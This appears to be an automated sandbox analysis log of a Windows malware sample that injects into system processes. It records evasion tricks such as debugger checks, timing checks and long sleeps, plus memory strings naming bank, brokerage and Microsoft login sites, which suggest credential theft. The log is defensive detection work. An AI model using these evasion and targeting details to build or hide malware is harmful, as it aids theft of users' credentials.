            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493538091.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4570865384.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: convert.pdbGCTL source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
            Source: hkLFB22XxS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: hkLFB22XxS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: hkLFB22XxS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: hkLFB22XxS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: hkLFB22XxS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0088C304 LoadLibraryA,GetProcAddress,1_2_0088C304
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00838B85 push ecx; ret 1_2_00838B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144AD push eax; ret 2_2_004144C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407823 push D4BE487Bh; retf 2_2_00407829
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004142D1 push ecx; ret 2_2_004142D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D290 push edx; ret 2_2_0040D2CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004073A5 push esi; retf 2_2_004073A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C4A3 push edi; ret 2_2_0042C4AC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418708 push ecx; retn 7131h2_2_00418703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004077D2 push eax; ret 2_2_004077D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417792 pushad ; retf 2_2_004177AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0283D push eax; iretd 2_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F01368 push eax; iretd 2_2_02F01369
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DB225F pushad ; ret 8_2_02DB27F9
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DB27FA pushad ; ret 8_2_02DB27F9
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DB283D push eax; iretd 8_2_02DB2858
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DE09AD push ecx; mov dword ptr [esp], ecx8_2_02DE09B6
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DB1368 push eax; iretd 8_2_02DB1369
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00230000 push ebp; ret 8_2_00230005
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0024421F pushad ; retf 8_2_00244238
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0023425F push eax; ret 8_2_00234265
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002342B0 push D4BE487Bh; retf 8_2_002342B6
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00240D5E push ecx; ret 8_2_00240D61
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00258F30 push edi; ret 8_2_00258F39
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00240F3A push eax; ret 8_2_00240F52
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0024B66D push ecx; iretd 8_2_0024B66E
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0024F8F5 push esp; ret 8_2_0024F8F9
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00247AB0 push esi; retf 8_2_00247ABA
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00814A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00814A35
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_008955FD
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_008333C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeAPI/Special instruction interceptor: Address: 24431F4
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\convert.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\convert.exeWindow / User API: threadDelayed 5778Jump to behavior
            Source: C:\Windows\SysWOW64\convert.exeWindow / User API: threadDelayed 4194Jump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-99391
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\convert.exeAPI coverage: 2.5 %
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052Thread sleep count: 5778 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052Thread sleep time: -11556000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052Thread sleep count: 4194 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\convert.exe TID: 1052Thread sleep time: -8388000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\convert.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00874696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00874696
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0087C9C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087C93C FindFirstFileW,FindClose,1_2_0087C93C
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0087F200
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0087F35D
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0087F65E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00873A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00873A2B
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00873D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00873D4E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0087BF27
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0024BB30 FindFirstFileW,FindNextFileW,FindClose,8_2_0024BB30
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00814AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00814AFE
            Source: -16743.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: -16743.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: -16743.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: -16743.8.drBinary or memory string: discord.comVMware20,11696487552f
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,11696487552
            Source: -16743.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696487552|UE
            Source: -16743.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,116
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,1169648w
            Source: -16743.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: -16743.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: -16743.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: -16743.8.drBinary or memory string: global block list test formVMware20,11696487552
            Source: -16743.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.co.inVMware20,11696487552~
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11
            Source: -16743.8.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: -16743.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: firefox.exe, 0000000B.00000002.2853412077.000002B6B18EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: -16743.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: -16743.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: -16743.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: -16743.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,9
            Source: -16743.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: -16743.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: -16743.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578311230.0000000000F7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
            Source: -16743.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: -16743.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: -16743.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: -16743.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: -16743.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: -16743.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: -16743.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: -16743.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: -16743.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: -16743.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: -16743.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeAPI call chain: ExitProcess graph end nodegraph_1-98744
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeAPI call chain: ExitProcess graph end nodegraph_1-98315
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004176E3 LdrLoadDll,2_2_004176E3
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008841FD BlockInput,1_2_008841FD
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00813B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00813B4C
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00845CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00845CCC
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0088C304 LoadLibraryA,GetProcAddress,1_2_0088C304
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_02443460 mov eax, dword ptr fs:[00000030h]1_2_02443460
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_024434C0 mov eax, dword ptr fs:[00000030h]1_2_024434C0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_02441E70 mov eax, dword ptr fs:[00000030h]1_2_02441E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300634F mov eax, dword ptr fs:[00000030h]2_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
